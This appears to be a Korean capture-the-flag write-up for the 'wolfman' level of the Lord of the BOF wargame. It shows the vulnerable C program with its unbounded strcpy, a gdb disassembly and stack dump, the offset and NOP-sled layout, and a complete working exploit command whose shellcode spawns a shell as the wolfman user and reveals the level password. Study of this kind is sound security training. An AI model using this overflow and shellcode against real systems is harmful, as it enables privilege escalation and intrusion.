[orc@localhost orc]$ cat wolfman.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - wolfman
        - egghunter + buffer hunter
*/

#include <stdio.h>
#include <stdlib.h>

extern char **environ;

/*
 * Program entry point.
 *
 * Declared without a return type (pre-C99 implicit `int`) and with no
 * explicit return statement. memset(), strlen() and strcpy() are called
 * although <string.h> is not included above, so they are implicitly
 * declared here.
 *
 * Takes one command-line argument and copies it into a fixed 40-byte
 * stack buffer with strcpy(), i.e. with no length check; the copy is
 * what makes this binary a stack-overflow exercise. Two mitigations are
 * applied around it: every environment string is zeroed before the copy,
 * and the local buffer is zeroed after it has been printed.
 */
main(int argc, char *argv[])
{
        char buffer[40];        // destination of the unbounded strcpy() below
        int i;

        // A single argument is required; exit(0) on misuse, not a failure code.
        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        // egghunter
        // Overwrites every environment string in place with zeros, so nothing
        // placed in the environment survives to the copy below.
        for(i=0; environ[i]; i++)
                memset(environ[i], 0, strlen(environ[i]));

        // Byte 47 of the argument must be 0xbf. argv[1] is not checked to be at
        // least 48 bytes long first, so a shorter argument makes this an
        // out-of-bounds read past the string's terminator.
        if(argv[1][47] != '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }
        // No bound: argv[1] may be any length, buffer holds 40 bytes. A
        // length-checked copy (e.g. snprintf(buffer, sizeof buffer, "%s", argv[1]))
        // would prevent the overflow that this exercise is built around.
        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

        // buffer hunter
        // Clears only the declared 40 bytes; anything strcpy() wrote past the
        // end of buffer (saved frame pointer, return address) is left as is.
        memset(buffer, 0, 40);
}

(gdb) disas main
Dump of assembler code for function main:
0x8048500 <main>:       push   %ebp
0x8048501 <main+1>:     mov    %esp,%ebp
0x8048503 <main+3>:     sub    $0x2c,%esp
0x8048506 <main+6>:     cmpl   $0x1,0x8(%ebp)
0x804850a <main+10>:    jg     0x8048523 <main+35>
0x804850c <main+12>:    push   $0x8048640
0x8048511 <main+17>:    call   0x8048410 <printf>
0x8048516 <main+22>:    add    $0x4,%esp
0x8048519 <main+25>:    push   $0x0
0x804851b <main+27>:    call   0x8048420 <exit>
0x8048520 <main+32>:    add    $0x4,%esp



                        (중간 생략)

0x80485ae <main+174>:   mov    %esi,%esi
0x80485b0 <main+176>:   mov    0xc(%ebp),%eax
0x80485b3 <main+179>:   add    $0x4,%eax
0x80485b6 <main+182>:   mov    (%eax),%edx
0x80485b8 <main+184>:   push   %edx
0x80485b9 <main+185>:   lea    0xffffffd8(%ebp),%eax
0x80485bc <main+188>:   push   %eax //strcpy 실행 이전에 bp를 걸었다. argv주소를 이용했기 때문이다.
0x80485bd <main+189>:   call   0x8048440 <strcpy>
0x80485c2 <main+194>:   add    $0x8,%esp //<---물론 이쪽에 bp를 걸고 버퍼의 주소를 이용해도 된다.
0x80485c5 <main+197>:   lea    0xffffffd8(%ebp),%eax
0x80485c8 <main+200>:   push   %eax
0x80485c9 <main+201>:   push   $0x8048669
0x80485ce <main+206>:   call   0x8048410 <printf>
0x80485d3 <main+211>:   add    $0x8,%esp
0x80485d6 <main+214>:   push   $0x28
0x80485d8 <main+216>:   push   $0x0
---Type <return> to continue, or q <return> to quit---
0x80485da <main+218>:   lea    0xffffffd8(%ebp),%eax
0x80485dd <main+221>:   push   %eax
0x80485de <main+222>:   call   0x8048430 <memset>
0x80485e3 <main+227>:   add    $0xc,%esp
0x80485e6 <main+230>:   leave
0x80485e7 <main+231>:   ret
0x80485e8 <main+232>:   nop
0x80485e9 <main+233>:   nop


(gdb) b*main+188
Breakpoint 1 at 0x80485bc
(gdb) r `python -c 'print "\xbf"*48'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/orc/./wolfma1 `python -c 'print "\xbf"*48'`

0xbffffc38:     0x00000000      0x69000000      0x00363836      0x6d6f682f
0xbffffc48:     0x726f2f65      0x2f2e2f63      0x666c6f77      0x0031616d
0xbffffc58:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffc68:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffc78:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf //<--우리가 덮어쓸 ret주소
0xbffffc88:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffc98:     0x00000000      0x00000000      0x00000000      0x00000000


<------버퍼(40)+sfp(4)+ret(4)+nop(200)+쉘코드------> //ret에 버퍼의 nop주소를 넣어도되고 원본 문자열인 argv[1]의 nop주소를 넣어도 된다.


[orc@localhost orc]$ ./wolfman `python -c 'print "\x90"*44+"\xee\xfa\xff\xbf"+"\x90"*200+"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒1▒1̀▒É▒1▒F̀1▒Ph//shh/bin▒▒PS▒▒°
                                     ̀
bash$ whoami
wolfman
bash$ my-pass
euid = 505
love eyuna



